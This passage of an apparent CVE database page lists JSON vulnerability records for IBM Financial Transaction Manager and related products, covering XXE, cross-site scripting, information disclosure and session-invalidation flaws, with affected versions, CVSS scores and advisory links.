http://www.ibm.com/support/docview.wss?uid=swg22013432 | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=swg22012828 | x_refsource_CONFIRM | |
http://www.ibm.com/support/docview.wss?uid=swg22013375 | x_refsource_CONFIRM |
Vendor | Product | Version | ||||||||||||
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
▼ | IBM | Control Center |
Version: 6.0 Version: 6.1 Version: 6.1.1 |
|||||||||||
|
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T13:39:32.241Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135859" }, { "name": "103130", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/103130" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013432" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22012828" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013375" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Control Center", "vendor": "IBM", "versions": [ { "status": "affected", "version": "6.0" }, { "status": "affected", "version": "6.1" }, { "status": "affected", "version": "6.1.1" } ] }, { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.2" }, { "status": "affected", "version": "3.0.2.0" }, { "status": "affected", "version": "3.0.2.1" }, { "status": "affected", "version": "3.0.4" }, { "status": "affected", "version": "3.0.4.0" }, { "status": "affected", "version": "3.1.0" }, { "status": "affected", "version": "3.1.0.0" }, { "status": "affected", "version": "3.0.3" }, { "status": "affected", "version": "3.0.3.0" } ] }, { "product": "Transformation Extender Advanced", "vendor": "IBM", "versions": [ { "status": "affected", "version": "9.0" } ] } ], "datePublic": "2018-02-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for ACH Services for Multi-Platform (IBM Control Center 6.0 and 6.1, IBM Financial Transaction Manager 3.0.2, 3.0.3, 3.0.4, and 3.1.0, IBM Transformation Extender Advanced 9.0) is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 135859." } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-02-24T10:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135859" }, { "name": "103130", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/103130" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013432" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22012828" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013375" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2018-02-19T00:00:00", "ID": "CVE-2017-1758", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Control Center", "version": { "version_data": [ { "version_value": "6.0" }, { "version_value": "6.1" }, { "version_value": "6.1.1" } ] } }, { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.2" }, { "version_value": "3.0.2.0" }, { "version_value": "3.0.2.1" }, { "version_value": "3.0.4" }, { "version_value": "3.0.4.0" }, { "version_value": "3.1.0" }, { "version_value": "3.1.0.0" }, { "version_value": "3.0.3" }, { "version_value": "3.0.3.0" } ] } }, { "product_name": "Transformation Extender Advanced", "version": { "version_data": [ { "version_value": "9.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for ACH Services for Multi-Platform (IBM Control Center 6.0 and 6.1, IBM Financial Transaction Manager 3.0.2, 3.0.3, 3.0.4, and 3.1.0, IBM Transformation Extender Advanced 9.0) is vulnerable to a XML External Entity Injection (XXE) attack when processing XML data. A remote attacker could exploit this vulnerability to expose sensitive information or consume memory resources. IBM X-Force ID: 135859." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135859", "refsource": "MISC", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/135859" }, { "name": "103130", "refsource": "BID", "url": "http://www.securityfocus.com/bid/103130" }, { "name": "http://www.ibm.com/support/docview.wss?uid=swg22013432", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=swg22013432" }, { "name": "http://www.ibm.com/support/docview.wss?uid=swg22012828", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=swg22012828" }, { "name": "http://www.ibm.com/support/docview.wss?uid=swg22013375", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=swg22013375" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2017-1758", "datePublished": "2018-02-21T21:00:00Z", "dateReserved": "2016-11-30T00:00:00", "dateUpdated": "2024-09-16T17:03:15.367Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2021-29841
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6488407 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/205045 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-03T22:18:03.188Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6488407" }, { "name": "ibm-ftm-cve202129841-xss (205045)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/205045" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2021-09-13T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205045." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 5.4, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "HIGH", "integrityImpact": "LOW", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "CHANGED", "temporalScore": 5.2, "temporalSeverity": "MEDIUM", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.0/I:L/C:L/S:C/AV:N/PR:L/A:N/UI:R/AC:L/E:H/RL:O/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Cross-Site Scripting", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2021-09-14T13:25:27", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6488407" }, { "name": "ibm-ftm-cve202129841-xss (205045)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/205045" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2021-09-13T00:00:00", "ID": "CVE-2021-29841", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.2.4 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 205045." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "L", "S": "C", "UI": "R" }, "TM": { "E": "H", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Cross-Site Scripting" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6488407", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6488407 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6488407" }, { "name": "ibm-ftm-cve202129841-xss (205045)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/205045" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2021-29841", "datePublished": "2021-09-14T13:25:27.806449Z", "dateReserved": "2021-03-31T00:00:00", "dateUpdated": "2024-09-17T03:49:12.177Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-5026
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6958504 | vendor-advisory | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/193662 | vdb-entry |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.0 ≤ |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:22:09.092Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "vendor-advisory", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6958504" }, { "tags": [ "vdb-entry", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/193662" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "defaultStatus": "unaffected", "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "lessThan": "3.2.7", "status": "affected", "version": "3.2.0", "versionType": "semver" } ] } ], "descriptions": [ { "lang": "en", "supportingMedia": [ { "base64": false, "type": "text/html", "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.2.0 through 3.2.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 193662." } ], "value": "IBM Financial Transaction Manager for Digital Payments for Multi-Platform 3.2.0 through 3.2.7 could allow a remote attacker to obtain sensitive information when a detailed technical error message is returned in the browser. This information could be used in further attacks against the system. IBM X-Force ID: 193662." } ], "metrics": [ { "cvssV3_1": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.1" }, "format": "CVSS", "scenarios": [ { "lang": "en", "value": "GENERAL" } ] } ], "problemTypes": [ { "descriptions": [ { "cweId": "CWE-209", "description": "CWE-209 Generation of Error Message Containing Sensitive Information", "lang": "en", "type": "CWE" } ] } ], "providerMetadata": { "dateUpdated": "2023-03-01T21:28:02.073Z", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "vendor-advisory" ], "url": "https://www.ibm.com/support/pages/node/6958504" }, { "tags": [ "vdb-entry" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/193662" } ], "source": { "discovery": "UNKNOWN" }, "x_generator": { "engine": "Vulnogram 0.1.0-dev" } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-5026", "datePublished": "2023-03-01T21:28:02.073Z", "dateReserved": "2019-12-30T00:00:00.000Z", "dateUpdated": "2024-08-04T08:22:09.092Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1392
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://exchange.xforce.ibmcloud.com/vulnerabilities/138377 | x_refsource_MISC | |
http://www.ibm.com/support/docview.wss?uid=swg22013249 | x_refsource_CONFIRM |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.4 Version: 3.0.4.0 Version: 3.1.0 Version: 3.1.0.0 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T03:59:39.009Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_MISC", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138377" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013249" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.4" }, { "status": "affected", "version": "3.0.4.0" }, { "status": "affected", "version": "3.1.0" }, { "status": "affected", "version": "3.1.0.0" } ] } ], "datePublic": "2018-02-19T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.0.4 and 3.1.0 for ACH Services for Multi-Platform could allow an authenticated user to execute a specially crafted command that could obtain sensitive information. IBM X-Force ID: 138377." } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-02-22T18:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_MISC" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138377" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013249" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2018-02-19T00:00:00", "ID": "CVE-2018-1392", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.4" }, { "version_value": "3.0.4.0" }, { "version_value": "3.1.0" }, { "version_value": "3.1.0.0" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.0.4 and 3.1.0 for ACH Services for Multi-Platform could allow an authenticated user to execute a specially crafted command that could obtain sensitive information. IBM X-Force ID: 138377." } ] }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138377", "refsource": "MISC", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138377" }, { "name": "http://www.ibm.com/support/docview.wss?uid=swg22013249", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=swg22013249" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1392", "datePublished": "2018-02-22T19:00:00Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-17T04:20:06.629Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2018-1393
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
http://www.ibm.com/support/docview.wss?uid=swg22013250 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/138378 | vdb-entry, x_refsource_XF | |
http://www.securityfocus.com/bid/104466 | vdb-entry, x_refsource_BID |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.6 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-05T03:59:39.031Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013250" }, { "name": "ibm-ftm-cve20181393-info-disc(138378)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138378" }, { "name": "104466", "tags": [ "vdb-entry", "x_refsource_BID", "x_transferred" ], "url": "http://www.securityfocus.com/bid/104466" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.6" } ] } ], "datePublic": "2018-06-08T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager for ACH Services for Multi-Platform 3.0.6 could allow an authenticated user to execute a specially crafted command that could obtain sensitive information. IBM X-Force ID: 138378." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.1, "baseSeverity": "LOW", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "NONE", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 2.7, "temporalSeverity": "LOW", "userInteraction": "NONE", "vectorString": "CVSS:3.0/A:N/AC:H/AV:N/C:L/I:N/PR:L/S:U/UI:N/E:U/RC:C/RL:O", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Obtain Information", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2018-06-15T09:57:01", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "http://www.ibm.com/support/docview.wss?uid=swg22013250" }, { "name": "ibm-ftm-cve20181393-info-disc(138378)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138378" }, { "name": "104466", "tags": [ "vdb-entry", "x_refsource_BID" ], "url": "http://www.securityfocus.com/bid/104466" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2018-06-08T00:00:00", "ID": "CVE-2018-1393", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.6" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager for ACH Services for Multi-Platform 3.0.6 could allow an authenticated user to execute a specially crafted command that could obtain sensitive information. IBM X-Force ID: 138378." } ] }, "impact": { "cvssv3": { "BM": { "A": "N", "AC": "H", "AV": "N", "C": "L", "I": "N", "PR": "L", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Obtain Information" } ] } ] }, "references": { "reference_data": [ { "name": "http://www.ibm.com/support/docview.wss?uid=swg22013250", "refsource": "CONFIRM", "url": "http://www.ibm.com/support/docview.wss?uid=swg22013250" }, { "name": "ibm-ftm-cve20181393-info-disc(138378)", "refsource": "XF", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/138378" }, { "name": "104466", "refsource": "BID", "url": "http://www.securityfocus.com/bid/104466" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2018-1393", "datePublished": "2018-06-13T14:00:00Z", "dateReserved": "2017-12-13T00:00:00", "dateUpdated": "2024-09-16T23:21:34.674Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4555
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6388702 | x_refsource_CONFIRM | |
https://www.ibm.com/support/pages/node/6388744 | x_refsource_CONFIRM | |
https://www.ibm.com/support/pages/node/6388708 | x_refsource_CONFIRM | |
https://www.ibm.com/support/pages/node/6388706 | x_refsource_CONFIRM | |
https://www.ibm.com/support/pages/node/6388704 | x_refsource_CONFIRM | |
https://www.ibm.com/support/pages/node/6388722 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/183328 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.0.2 Version: 2.1.1 Version: 3.1.0 Version: 3.0.5 Version: 3.0.6 Version: 3.0.0 Version: 3.2.2 Version: 3.2.3 Version: 3.2.4 |
{ "containers": { "adp": [ { "providerMetadata": { "dateUpdated": "2024-08-04T08:07:49.056Z", "orgId": "af854a3a-2127-422b-91ae-364da2661108", "shortName": "CVE" }, "references": [ { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6388702" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6388744" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6388708" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6388706" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6388704" }, { "tags": [ "x_refsource_CONFIRM", "x_transferred" ], "url": "https://www.ibm.com/support/pages/node/6388722" }, { "name": "ibm-ftm-cve20204555-session-fixation (183328)", "tags": [ "vdb-entry", "x_refsource_XF", "x_transferred" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183328" } ], "title": "CVE Program Container" } ], "cna": { "affected": [ { "product": "Financial Transaction Manager", "vendor": "IBM", "versions": [ { "status": "affected", "version": "3.0.2" }, { "status": "affected", "version": "2.1.1" }, { "status": "affected", "version": "3.1.0" }, { "status": "affected", "version": "3.0.5" }, { "status": "affected", "version": "3.0.6" }, { "status": "affected", "version": "3.0.0" }, { "status": "affected", "version": "3.2.2" }, { "status": "affected", "version": "3.2.3" }, { "status": "affected", "version": "3.2.4" } ] } ], "datePublic": "2020-12-18T00:00:00", "descriptions": [ { "lang": "en", "value": "IBM Financial Transaction Manager 3.0.6 and 3.1.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 183328." } ], "metrics": [ { "cvssV3_0": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 6.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "exploitCodeMaturity": "UNPROVEN", "integrityImpact": "LOW", "privilegesRequired": "LOW", "remediationLevel": "OFFICIAL_FIX", "reportConfidence": "CONFIRMED", "scope": "UNCHANGED", "temporalScore": 5.5, "temporalSeverity": "MEDIUM", "userInteraction": "NONE", "vectorString": "CVSS:3.0/S:U/UI:N/AV:N/PR:L/AC:L/I:L/C:L/A:L/E:U/RL:O/RC:C", "version": "3.0" } } ], "problemTypes": [ { "descriptions": [ { "description": "Gain Privileges", "lang": "en", "type": "text" } ] } ], "providerMetadata": { "dateUpdated": "2020-12-21T17:50:28", "orgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "shortName": "ibm" }, "references": [ { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6388702" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6388744" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6388708" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6388706" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6388704" }, { "tags": [ "x_refsource_CONFIRM" ], "url": "https://www.ibm.com/support/pages/node/6388722" }, { "name": "ibm-ftm-cve20204555-session-fixation (183328)", "tags": [ "vdb-entry", "x_refsource_XF" ], "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183328" } ], "x_legacyV4Record": { "CVE_data_meta": { "ASSIGNER": "psirt@us.ibm.com", "DATE_PUBLIC": "2020-12-18T00:00:00", "ID": "CVE-2020-4555", "STATE": "PUBLIC" }, "affects": { "vendor": { "vendor_data": [ { "product": { "product_data": [ { "product_name": "Financial Transaction Manager", "version": { "version_data": [ { "version_value": "3.0.2" }, { "version_value": "2.1.1" }, { "version_value": "3.1.0" }, { "version_value": "3.0.5" }, { "version_value": "3.0.6" }, { "version_value": "3.0.0" }, { "version_value": "3.2.2" }, { "version_value": "3.2.3" }, { "version_value": "3.2.4" } ] } } ] }, "vendor_name": "IBM" } ] } }, "data_format": "MITRE", "data_type": "CVE", "data_version": "4.0", "description": { "description_data": [ { "lang": "eng", "value": "IBM Financial Transaction Manager 3.0.6 and 3.1.0 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 183328." } ] }, "impact": { "cvssv3": { "BM": { "A": "L", "AC": "L", "AV": "N", "C": "L", "I": "L", "PR": "L", "S": "U", "UI": "N" }, "TM": { "E": "U", "RC": "C", "RL": "O" } } }, "problemtype": { "problemtype_data": [ { "description": [ { "lang": "eng", "value": "Gain Privileges" } ] } ] }, "references": { "reference_data": [ { "name": "https://www.ibm.com/support/pages/node/6388702", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6388702 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6388702" }, { "name": "https://www.ibm.com/support/pages/node/6388744", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6388744 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6388744" }, { "name": "https://www.ibm.com/support/pages/node/6388708", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6388708 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6388708" }, { "name": "https://www.ibm.com/support/pages/node/6388706", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6388706 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6388706" }, { "name": "https://www.ibm.com/support/pages/node/6388704", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6388704 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6388704" }, { "name": "https://www.ibm.com/support/pages/node/6388722", "refsource": "CONFIRM", "title": "IBM Security Bulletin 6388722 (Financial Transaction Manager)", "url": "https://www.ibm.com/support/pages/node/6388722" }, { "name": "ibm-ftm-cve20204555-session-fixation (183328)", "refsource": "XF", "title": "X-Force Vulnerability Report", "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/183328" } ] } } } }, "cveMetadata": { "assignerOrgId": "9a959283-ebb5-44b6-b705-dcc2bbced522", "assignerShortName": "ibm", "cveId": "CVE-2020-4555", "datePublished": "2020-12-21T17:50:28.202953Z", "dateReserved": "2019-12-30T00:00:00", "dateUpdated": "2024-09-17T04:29:10.320Z", "state": "PUBLISHED" }, "dataType": "CVE_RECORD", "dataVersion": "5.1" }
cve-2020-4907
Vulnerability from cvelistv5
▼ | URL | Tags |
---|---|---|
https://www.ibm.com/support/pages/node/6371260 | x_refsource_CONFIRM | |
https://exchange.xforce.ibmcloud.com/vulnerabilities/191112 | vdb-entry, x_refsource_XF |
Vendor | Product | Version | ||
---|---|---|---|---|
IBM | Financial Transaction Manager |
Version: 3.2.4 |
